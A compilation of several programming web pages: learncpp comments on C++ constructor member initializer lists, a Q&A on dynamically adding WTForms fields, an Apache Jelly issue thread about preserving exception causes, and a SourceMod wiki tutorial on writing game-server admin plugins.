No, you aren't. The default value of 8 is only used to initialize member 'a' in cases where no explicit initializer for 'a' is provided by the constructor. If an explicit initializer is provided (which your default constructor does), that initialization value is used instead (not also). Therefore, member 'a' will be initialized once, and the value will not be overwritten. No re-initialization takes place, and no violation of const occurs.

I used your code to test the difference between the non-object-oriented style and the C++11 constructor member initializer list. The C++11 style is about 50 times faster than the non-object-oriented style.

    [xx OFtutorial0_helloWorld]$ whatAboutThisGuy
    Time elapsed: 7.506e-06
    Time elapsed: 1.47e-07
    [xx OFtutorial0_helloWorld]$ whatAboutThisGuy
    Time elapsed: 8.664e-06
    Time elapsed: 1.9e-07
    [xx OFtutorial0_helloWorld]$ whatAboutThisGuy
    Time elapsed: 7.646e-06
    Time elapsed: 1.89e-07

Just play with it.

Hey Alex, any feedback I can get on this? (I tried using a std::array for the RGBA quiz; also, I prefix my classes with the letter C, so my code has CRGBA instead of RGBA.) Thanks for the great tutorials, finally I made it to the best bits :glasses:

Looks good. A few minor suggestions:

1) I don't think it's necessary to cast ColorComponent::MAX_COLORS to a uint8_t -- enums are already treated as integers.

2) If ColorComponent is only going to be used inside the CRGBA class, it would be better to define ColorComponent inside the CRGBA class (without the ColorComponent namespace). That way it's clear the two are linked, and you won't have to use the ColorComponent prefix inside the class.

That makes sense, thanks!

Initializing const member variables at run-time or with users' input: I never thought this would work, because in the previous lessons const/reference member variables have to be initialized, but the below code bypassed it.
Const just means the variable needs to be initialized with a value, and past that point the value can't be changed. Your program doesn't violate that at all. The following simpler program works too:

Hi Alex, I think you should mention how to write member initializer lists outside the class definition. I know that it may not be the ideal thing to do, but it is an option that we can use. For example: Point2d.h, Point2d.cpp.

I don't cover member functions outside the class definition until lesson 8.9. I've updated that lesson to show an example of a member initialization list outside the class definition.

Hi, Alex. You have awesome tutorials. I'm wondering why the member variables of the RGBA class have to be cast to int in the print() function. Why, if I don't cast them, won't the program output the values?

Hey Hieu. m_red, m_green, m_blue, and m_alpha are of the "std::uint8_t" type. He is casting them to int because "std::cout" may treat "std::uint8_t" as a "char" type, which would print a character to the screen instead.

uint8_t is mostly like a typedef for an unsigned char, so printing the value will print the character whose ASCII code is that value. Not what we're looking for here. Casting to an int ensures we print the numeric value.

Hey, it just keeps getting more and more interesting and powerful, and you seem to be able to keep the same high quality of explanations. With all of this learned on constructors, does that mean a class should only ever have one constructor? Default values and initializer lists seem to make it possible for most cases. Thanks.

It's totally fine for classes to have multiple constructors (if it makes sense for the class to be initialized in different ways).

Hi Alex, in the given code: how can we instantiate an object of class A on line 12 if the default constructor isn't provided in class A? Reply please 🙂

We don't ever create an object of type A without a parameter, so a default constructor isn't needed.
B b(5) instantiates an object of type B, which allocates memory for B, including the member m_a of type A. B's constructor is then executed with parameter 5, and the variable m_a is initialized using the A(int) constructor to the value of 4. Remember, classes are just type definitions. They do not actually allocate memory until an object of the class is instantiated.

I think you got me wrong! Let me start again. We know that compilation starts from the start of the program, yes? OK, so when it encounters class A it doesn't allocate any memory for it, as we know that it is just a type definition. Then it goes to class B, and there it encounters "A m_a"; but then, shouldn't it flag that as an error, as there is no default constructor provided in class A?

No, because a default constructor for A is never called. We only ever initialize A with an integer parameter, so we only need a constructor that can handle an int.

It is called on line 12, no?

No. Line 12 just tells the compiler that B contains an A member named m_a. Initialization is handled via the constructors.

So, why does this print "A"? Shouldn't it just "tell" the compiler that B contains an A member named m_a?

If you don't explicitly tell the compiler how to initialize a member that is itself a class, the compiler will default to using the default constructor. In this case, the B constructor doesn't initialize m_a, so the compiler uses the default constructor for A to initialize m_a.

Just like that, in the first case we haven't told the compiler how to initialize member m_a till line 14. So why doesn't it flag line 12 as an error?

Because it's just part of the type definition; it doesn't actually instantiate anything, so there's no need to specify how the variable is initialized at that point.

Look, we all know that a variable can only be created once, yes? So, in the section "Member Initialization Lists", how can we create a single member variable twice: first, when we create it.
Example:

Second, when we initialize it using member initialization lists (initialization involves CREATION too!). Example:

I hope you have understood my question 🙂

Three things:

1) This is a variable definition:
2) This is a variable initialization:
3) This is the variable instantiation:

When we instantiate variable s (of type Something), the member m_value is created. It is then initialized by the constructor.

That's what I'm asking, bro! When variable m_value is created for the first time, how can it be initialized (which involves creation too!)? The following isn't valid, no?

No, that's not valid, as it's a redefinition of x. When you type "int x = 5", variable x is first given a memory location, and then it is initialized to 5. With classes, when you instantiate an object, the object is first given a memory location, and then the constructor is called to initialize the object. With fundamental variables, the definition and initialization are done in the same line. With classes, the definition and initialization are done on separate lines. This was done so that different constructors can initialize members in different ways, depending on which constructor was called.

So, it means re-creation is allowed in the case of classes!

I don't know what "re-creation" means in this case. As I said, the difference is that in classes, the definition and initialization happen in separate places. The compiler handles the details. There are no redefinitions here.

It means things "like" these are allowed in the case of classes: (note: I have said "LIKE")

I get what you're thinking here, but I think that's a bit misleading. In the int case, the top line actually instantiates an integer. In the class case, defining an int member doesn't actually instantiate an int.

See, but when we declare an object of this class, a specific amount of memory is instantiated for that object. And now, memory is allocated for members also!
Now my question arrives: how is member m_x defined two times (first, definition, e.g. int x; and second, initialization, which involves definition too, e.g. int x = 5;)? Or are definition and initialization done in different places in classes?

That's what I've been telling you -- definition and initialization usually happen separately in classes.

Can you tell me the reason why it is so different in classes?

So that different constructors can initialize the members in different ways if desired. If you had to initialize the variables right where they were defined, then constructors wouldn't be near as useful.

Due to the wording in your quiz, I interpreted the question in a different way than your solution provided. The first part was simple enough: if RGBA were instantiated with no arguments, then the RGBA members will be initialized to 0, 0, 0, 255. The second part says if the user passes red, green, blue and optionally alpha, then initialize the members accordingly. Due to the fact that 'optionally' is used on only alpha, that tells me that all three color components must be provided. Your solution would allow only red, or only red and blue, components to be provided. My solution, according to my own interpretation of the question, uses these two constructors. Also want to thank you for taking the time to provide these tutorials.

I removed the word optionally, since I agree that was a bit confusing. 🙂 Thanks for pointing that out.

Isn't this code format better, for the last question of the quiz?

Yes, except it's generally considered better to put the << at the end of the previous line. I've updated the example. Thanks!

Hi Alex! Very nice site, thank you so much! I would appreciate it if you would help me to solve this. If we have the following class: And the following main function: Is this correct:

1) the constructor for the object y is called (***)
2) the constructor for the object _y is called (///)
3) the assignment operator is called (###)

Thanks in advance!

(***) and (###) are correct.
The constructor for _y is actually called here: after the function parameters are assigned, but before the body of the constructor executes. This makes sense, since the definition of Yyy _y is just a definition; it's not executable code.
http://www.learncpp.com/cpp-tutorial/8-5a-constructor-member-initializer-lists/comment-page-2/
How would I dynamically create a few form fields with different questions, but the same answers?

    from wtforms import Form, RadioField
    from wtforms.validators import Required

    class VariableForm(Form):
        def __init__(self, formdata=None, obj=None, prefix='', **kwargs):
            super(VariableForm, self).__init__(formdata, obj, prefix, **kwargs)
            questions = kwargs['questions']
            # How to dynamically create three questions formatted as below?

        question = RadioField(
            # question ?,
            [Required()],
            choices=[('yes', 'Yes'), ('no', 'No')],
        )

    questions = ("Do you like peas?", "Do you like tea?", "Are you nice?")
    form = VariableForm(questions=questions)

It was in the docs all along:

    def my_view():
        class F(MyBaseForm):
            pass

        F.username = TextField('username')

        for name in iterate_some_model_dynamically():
            setattr(F, name, TextField(name.title()))

        form = F(request.POST, ...)
        # do view stuff

What I didn't realize is that the class attributes must be set before any instantiation occurs. The clarity comes from this Bitbucket comment:

This is not a bug, it is by design. There are a lot of problems with adding fields to instantiated forms -- for example, data comes in through the Form constructor. If you reread the thread you link, you'll notice you need to derive the class, add fields to that, and then instantiate the new class. Typically you'll do this inside your view handler.
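The core pattern here, derive a fresh class, attach attributes to it, then instantiate, can be demonstrated without wtforms at all. The sketch below is mine (BaseForm and make_form are made-up names, not wtforms API); it only illustrates why the attributes must exist on the class before the instance is created:

```python
class BaseForm:
    def __init__(self):
        # Collect whatever "fields" the (derived) class defines; wtforms'
        # metaclass does something conceptually similar at instantiation.
        self.fields = {name: value
                       for name, value in type(self).__dict__.items()
                       if not name.startswith('_')}

def make_form(questions):
    # Derive a fresh class so the base stays untouched, attach one
    # attribute per question, and only then instantiate.
    class F(BaseForm):
        pass
    for i, question in enumerate(questions):
        setattr(F, 'question_%d' % i, question)
    return F()

form = make_form(("Do you like peas?", "Do you like tea?", "Are you nice?"))
print(len(form.fields))  # -> 3
```

Setting the attributes after `F()` has run would be too late: the instance has already collected its fields, which is exactly the situation the Bitbucket comment describes.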
https://codedump.io/share/j0hE75MOM0wh/1/wtforms-create-variable-number-of-fields
Activity

Test cases fail after applying the patch. I'll investigate.

The patch was missing changes to testInvokeStaticTag.jelly and others.

Hmm, let me create a new patch then...

Will wait for the new patch before trying again. Also, when you throw the JellyException, can you please use the constructor that takes a string and a Throwable, so the original exception details are preserved? Thanks.

Fixed with minor changes.

Here is the change you've requested, preserving the original exception.

This patch appears to be a JDK 1.4-specific one. It uses Throwable.getCause(), which was introduced in JDK 1.4. I'm commenting those lines out for now.

Sorry, my bad, I used the wrong casts. Yes, Throwable.getCause() is JDK 1.4, but I'm using InvocationTarget.getTargetMessage() instead. I mean, there is also a call to jellyException.getCause(), but JellyException defines it independently of the JDK version. Anyway, I've just run Maven on it using JDK 1.3.1, and it worked fine. It's just a matter of modifying the test cases, changing the following line:

from:
    Exception jellyException = (Exception) getJellyContext().getVariable("jellyException");
to:
    JellyException jellyException = (JellyException) getJellyContext().getVariable("jellyException");

And also adding an import of org.apache.commons.jelly.JellyException. (Sorry, I don't have CVS set up right now to send you a patch.)

Fixing now.

Here is the patch and a snippet of the Maven test:

    [junit] Running org.apache.commons.jelly.core.TestInvokeStaticTag
    [junit] Tests run: 5, Failures: 0, Errors: 0, Time elapsed: 3.896 sec
    [junit] Running org.apache.commons.jelly.core.TestInvokeTag
    [junit] Tests run: 6, Failures: 0, Errors: 0, Time elapsed: 3.146 sec

Note that I'm not sure if the tags.html has been updated correctly - I couldn't run maven site:generate.
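The reviewer's request, "use the constructor that takes a string and a Throwable", is the standard Java exception-chaining idiom. A small sketch of my own (the class and method names below are hypothetical, not from the actual patch):

```java
public class PreserveCause {
    // Wrap a low-level failure in a higher-level exception while keeping
    // the original as the cause. JellyException gained an equivalent
    // (String, Throwable) constructor; RuntimeException is used here only
    // so the sketch is self-contained.
    static RuntimeException wrap(String message, Throwable original) {
        return new RuntimeException(message, original);
    }

    public static void main(String[] args) {
        Throwable original = new IllegalStateException("boom");
        RuntimeException wrapped = wrap("could not invoke tag method", original);
        // The original exception survives and its stack trace prints
        // as "Caused by: ..." when wrapped is reported.
        if (wrapped.getCause() != original) {
            throw new AssertionError("cause was not preserved");
        }
        System.out.println(wrapped.getMessage());
    }
}
```

Without the chained cause, only the wrapper's message survives, which is exactly the information loss the reviewer wanted to avoid.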
https://issues.apache.org/jira/browse/JELLY-116?focusedCommentId=37203&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
Introduction to SourceMod Plugins
From AMWiki

This guide will give you a basic introduction to writing a SourceMod plugin. If you are not familiar with the SourcePawn language, it is recommended that you at least briefly read the Introduction to SourcePawn article. For information on compiling plugins, see Compiling SourceMod Plugins.

The author of this article uses Crimson Editor to write plugins. Other possibilities are PSPad, UltraEdit, Notepad++, TextPad, or any other text editor you're comfortable with.

Plugin Structure

Almost all plugins have the same three elements:
- Includes - Allows you to access the SourceMod API, and if you desire, API from external SourceMod extensions/plugins.
- Info - Public information about your plugin.
- Startup - A function which performs start-up routines in your plugin.

A skeletal plugin structure looks like:

    #include <sourcemod>

    public Plugin:myinfo =
    {
        name = "My First Plugin",
        author = "Me",
        description = "My first plugin ever",
        version = "1.0.0.0",
        url = ""
    };

    public OnPluginStart()
    {
    }

The information portion is a special syntax construct. You cannot change any of the keywords, or the public Plugin:myinfo declaration. The best idea is to copy and paste this skeletal structure and modify the strings to get started.

Includes

Pawn requires include files, much like C requires header files. Include files list all of the structures, functions, callbacks, and tags that are available. There are three types of include files:
- Core include files, which is sourcemod.inc and anything it includes. These are all provided by SourceMod's Core.
- Extension include files, which if used, will add a dependency against a certain extension.
- Plugin include files, which if used, will add a dependency against a certain plugin.

Include files are loaded using the #include compiler directive.

Commands

Our first example will be writing a simple admin command to slap a player.
We'll continue to extend this example with more features until we have a final, complete result.

Declaration

First, let's look at what an admin command requires. Admin commands are registered using the RegAdminCmd function. They require a name, a callback function, and default admin flags. The callback function is what's invoked every time the command is used. Click here to see its prototype. Example:

    public OnPluginStart()
    {
        RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY)
    }

    public Action:Command_MySlap(client, args)
    {
    }

Now we've successfully implemented a command -- though it doesn't do anything yet. In fact, it will say "Unknown command" if you use it! The reason is because of the Action tag. The default functionality for entering console commands is to reply that they are unknown. To block this functionality, you must return a new action:

    public Action:Command_MySlap(client, args)
    {
        return Plugin_Handled;
    }

Now the command will report no error, but it still won't do anything.

Implementation

Let's decide what the command will look like. Let's have it act like the default sm_slap command:

    sm_myslap <name|#userid> [damage]

To implement this, we'll need a few steps:
- Get the input from the console. For this we use GetCmdArg().
- Find a matching player. For this we use FindTarget().
- Slap them. For this we use SlapPlayer(), which requires including sdktools, an extension bundled with SourceMod.
- Respond to the admin. For this we use ReplyToCommand().
Full example:

    #include <sourcemod>
    #include <sdktools>

    public Plugin:myinfo =
    {
        name = "My First Plugin",
        author = "Me",
        description = "My first plugin ever",
        version = "1.0.0.0",
        url = ""
    };

    public OnPluginStart()
    {
        RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY)
    }

    public Action:Command_MySlap(client, args)
    {
        new String:arg1[32], String:arg2[32]
        new damage = 5

        /* Get the target (first argument) */
        GetCmdArg(1, arg1, sizeof(arg1))

        /* If a damage value was specified, use it instead of the default */
        if (args > 1)
        {
            GetCmdArg(2, arg2, sizeof(arg2))
            damage = StringToInt(arg2)
        }

        /* Try and find a matching player */
        new target = FindTarget(client, arg1)
        if (target == -1)
        {
            /* FindTarget() automatically replies with the
             * failure reason. */
            return Plugin_Handled;
        }

        SlapPlayer(target, damage)

        new String:name[MAX_NAME_LENGTH]
        GetClientName(target, name, sizeof(name))
        ReplyToCommand(client, "[SM] You slapped %s for %d damage!", name, damage)

        return Plugin_Handled;
    }

For more information on what %s and %d are, see Format Class Functions. Note that you never need to unregister or remove your admin command. When a plugin is unloaded, SourceMod cleans it up for you.

ConVars

ConVars, also known as cvars, are global console variables in the Source engine. They can have integer, float, or string values. ConVar accessing is done through Handles. Since ConVars are global, you do not need to close ConVar Handles (in fact, you cannot). The handy feature of ConVars is that they are easy for users to configure. They can be placed in any .cfg file, such as server.cfg or sourcemod.cfg. To make this easier, SourceMod has an AutoExecConfig() function. This function will automatically build a default .cfg file containing all of your cvars, annotated with comments, for users. It is highly recommended that you call this if you have customizable ConVars.

Let's extend our example from earlier with a new ConVar. Our ConVar will be sm_myslap_damage, and it will specify the default damage someone is slapped for if no damage is specified.

    new Handle:sm_myslap_damage = INVALID_HANDLE

    public OnPluginStart()
    {
        RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY)
        sm_myslap_damage = CreateConVar("sm_myslap_damage", "5", "Default slap damage")
        AutoExecConfig(true, "sm_myslap")
    }

    /* The rest remains unchanged!
    */

Showing Activity, Logging

Almost all admin commands should log their activity, and some admin commands should show their activity to in-game clients. This can be done via the LogAction() and ShowActivity2() functions. The exact functionality of ShowActivity2() is determined by the sm_show_activity cvar. For example, let's rewrite the last few lines of our slap command:

        SlapPlayer(target, damage)

        new String:name[MAX_NAME_LENGTH]
        GetClientName(target, name, sizeof(name))

        ShowActivity2(client, "[SM] ", "Slapped %s for %d damage!", name, damage)
        LogAction(client, target, "\"%L\" slapped \"%L\" (damage %d)", client, target, damage)

        return Plugin_Handled;
    }

Multiple Targets

To fully complete our slap demonstration, let's make it support multiple targets. SourceMod's targeting system is quite advanced, so using it may seem complicated at first. The function we use is ProcessTargetString(). It takes in input from the console, and returns a list of matching clients. It also returns a noun that will identify either a single client or describe a list of clients. The idea is that each client is then processed, but the activity shown to all players is only processed once. This reduces screen spam. This method of target processing is used for almost every admin command in SourceMod, and in fact FindTarget() is just a simplified version.
Full, final example:

    #include <sourcemod>
    #include <sdktools>

    public Plugin:myinfo =
    {
        name = "My First Plugin",
        author = "Me",
        description = "My first plugin ever",
        version = "1.0.0.0",
        url = ""
    };

    public OnPluginStart()
    {
        LoadTranslations("common.phrases")
        RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY)
    }

    public Action:Command_MySlap(client, args)
    {
        new String:arg1[32], String:arg2[32]
        new damage = 5

        GetCmdArg(1, arg1, sizeof(arg1))
        if (args > 1)
        {
            GetCmdArg(2, arg2, sizeof(arg2))
            damage = StringToInt(arg2)
        }

        /**
         * target_name - stores the noun identifying the target(s)
         * target_list - array to store clients
         * target_count - variable to store number of clients
         * tn_is_ml - stores whether the noun must be translated
         */
        new String:target_name[MAX_TARGET_LENGTH]
        new target_list[MAXPLAYERS], target_count
        new bool:tn_is_ml

        if ((target_count = ProcessTargetString(
                arg1,
                client,
                target_list,
                MAXPLAYERS,
                COMMAND_FILTER_ALIVE, /* Only allow alive players */
                target_name,
                sizeof(target_name),
                tn_is_ml)) <= 0)
        {
            /* This function replies to the admin with a failure message */
            ReplyToTargetError(client, target_count);
            return Plugin_Handled;
        }

        for (new i = 0; i < target_count; i++)
        {
            SlapPlayer(target_list[i], damage)
            LogAction(client, target_list[i], "\"%L\" slapped \"%L\" (damage %d)", client, target_list[i], damage)
        }

        if (tn_is_ml)
        {
            ShowActivity2(client, "[SM] ", "Slapped %t for %d damage!", target_name, damage)
        }
        else
        {
            ShowActivity2(client, "[SM] ", "Slapped %s for %d damage!", target_name, damage)
        }

        return Plugin_Handled;
    }

Client and Entity Indexes

One major point of confusion with Half-Life 2 is the difference between the following things:
- Client index
- Entity index
- Userid

The first answer is that clients are entities. Thus, a client index and an entity index are the same thing. When a SourceMod function asks for an entity index, a client index can be specified. When a SourceMod function asks for a client index, usually it means only a client index can be specified. A fast way to check if an entity index is a client is checking whether it's between 1 and GetMaxClients() (inclusive). If a server has N client slots maximum, then entities 1 through N are always reserved for clients.
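The range check described above can be wrapped in a small helper. This is a sketch of my own; IsClientIndex is a hypothetical name, not a SourceMod native:

```sourcepawn
/* True if the entity index refers to a client slot (1..MaxClients).
 * Note this only checks the range; use IsClientInGame() to check
 * whether that slot is actually occupied. */
stock bool:IsClientIndex(entity)
{
    return (entity >= 1 && entity <= GetMaxClients());
}
```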
Note that 0 is a valid entity index; it is the world entity (worldspawn). A userid, on the other hand, is completely different. The server maintains a global "connection count" number, and it starts at 1. Each time a client connects, the connection count is incremented, and the client receives that new number as their userid. For example, the first client to connect has a userid of 2. If he exits and rejoins, his userid will be 3 (unless another client joins in between). Since clients are disconnected on mapchange, their userids change as well. Userids are a handy way to check if a client's connection status has changed. SourceMod provides two functions for userids: GetClientOfUserId() and GetClientUserId().

Events

Events are informational notification messages passed between objects in the server. Many are also passed from the server to the client. They are defined in .res files under the hl2/resource folder and the resource folders of specific mods. For a basic listing, see Source Game Events. It is important to note a few concepts about events:
- They are almost always informational. That is, blocking player_death will not stop a player from dying. It may block a HUD or console message or something else minor.
- They always use userids instead of client indexes.
- Just because it is in a resource file does not mean it is ever called, or works the way you expect it to. Mods are notorious for not properly documenting their event functionality.

An example of finding when a player dies:

    public OnPluginStart()
    {
        HookEvent("player_death", Event_PlayerDeath)
    }

    public Event_PlayerDeath(Handle:event, const String:name[], bool:dontBroadcast)
    {
        new victim_id = GetEventInt(event, "userid")
        new attacker_id = GetEventInt(event, "attacker")
        new victim = GetClientOfUserId(victim_id)
        new attacker = GetClientOfUserId(attacker_id)

        /* CODE */
    }

Callback Orders and Pairing

SourceMod has a number of built-in callbacks about the state of the server and plugin.
Some of these are paired in special ways, which can be confusing to users.

Pairing

Pairing is SourceMod terminology. Examples of it are:
- OnMapEnd() cannot be called without an OnMapStart(), and if OnMapStart() is called, it cannot be called again without an OnMapEnd().
- OnClientConnected(N) for a given client N will only be called once, until an OnClientDisconnected(N) for the same client N is called (which is guaranteed to happen).

There is a formal definition of SourceMod's pairing. For two functions X and Y, both with input A, the following conditions hold:
- If X is invoked with input A, it cannot be invoked again with the same input unless Y is called with input A.
- If X is invoked with input A, it is guaranteed that Y will, at some point, be called with input A.
- Y cannot be invoked with any input A unless X was also called with input A.
- The relationship is described as, "X is paired with Y," and "Y is paired to X."

General Callbacks

These callbacks are listed in the order they are called, in the lifetime of a plugin and the server.
- AskPluginLoad() - Called once, immediately after the plugin is loaded from the disk.
- OnPluginStart() - Called once, after the plugin has been fully initialized and can proceed to load. Any run-time errors in this function will cause the plugin to fail to load. This is paired with OnPluginEnd().
- OnMapStart() - Called every time the map loads. If the plugin is loaded late, and the map has already started, this function is called anyway after load, in order to preserve pairing. This function is paired with OnMapEnd().
- OnConfigsExecuted() - Called once per map-change after servercfgfile (usually server.cfg), sourcemod.cfg, and all plugin config files have finished executing. If a plugin is loaded after this has happened, the callback is called anyway, in order to preserve pairing. This function is paired with OnMapEnd().
- At this point, most game callbacks can occur, such as events and callbacks involving clients (or other things, like OnGameFrame).
- OnMapEnd() - Called when the map is about to end. At this point, all clients are disconnected, but TIMER_NO_MAPCHANGE timers are not yet destroyed. This function is paired to OnMapStart().
- OnPluginEnd() - Called once, immediately before the plugin is unloaded. This function is paired to OnPluginStart().

Client Callbacks

These callbacks are listed in no specific order; however, their documentation holds for both fake and real clients.
- OnClientConnect() - Called when a player initiates a connection. This is paired with OnClientDisconnect().
- OnClientAuthorized() - Called when a player gets a Steam ID. It is important to note that this may never be called. It may occur any time in between connect and disconnect. Do not rely on it unless you are writing something that needs Steam IDs, and even then you should use OnClientPostAdminCheck().
- OnClientPutInServer() - Signifies that the player is in-game and IsClientInGame() will return true.
- OnClientPostAdminCheck() - Called after the player is both authorized and in-game. That is, both OnClientAuthorized() and OnClientPutInServer() have been invoked. This is the best callback for checking administrative access after connect.
- OnClientDisconnect() - Called when a player's disconnection ends. This is paired to OnClientConnect().

Frequently Asked Questions

Are plugins reloaded every mapchange?

Plugins, by default, are not reloaded on mapchange unless their timestamp changes. This is a feature so plugin authors have more flexibility with the state of their plugins.

Do I need to call CloseHandle in OnPluginEnd?

No. SourceMod automatically closes your Handles when your plugin is unloaded, in order to prevent memory errors.

Do I need to #include every individual .inc?

No. #include <sourcemod> will give you 95% of the .incs.
Similarly, #include <sdktools> will give you everything the SDKTools extension provides.

Why don't some events fire?

There is no guarantee that events will fire. The event listing is not a specification; it is a list of the events that a game is capable of firing. Whether the game actually fires them is up to Valve or the developer.

Do I need to CloseHandle timers?

No. In fact, doing so may cause errors. Timers naturally die on their own unless they are infinite timers, in which case you can use KillTimer() or die gracefully by returning Plugin_Stop in the callback.

Are clients disconnected on mapchange?

All clients are fully disconnected before the map changes. They are all reconnected after the next map starts.

Further Reading

For further reading, see the "Scripting" section at the SourceMod Documentation.
http://wiki.alliedmods.net/Introduction_to_SourceMod_Plugins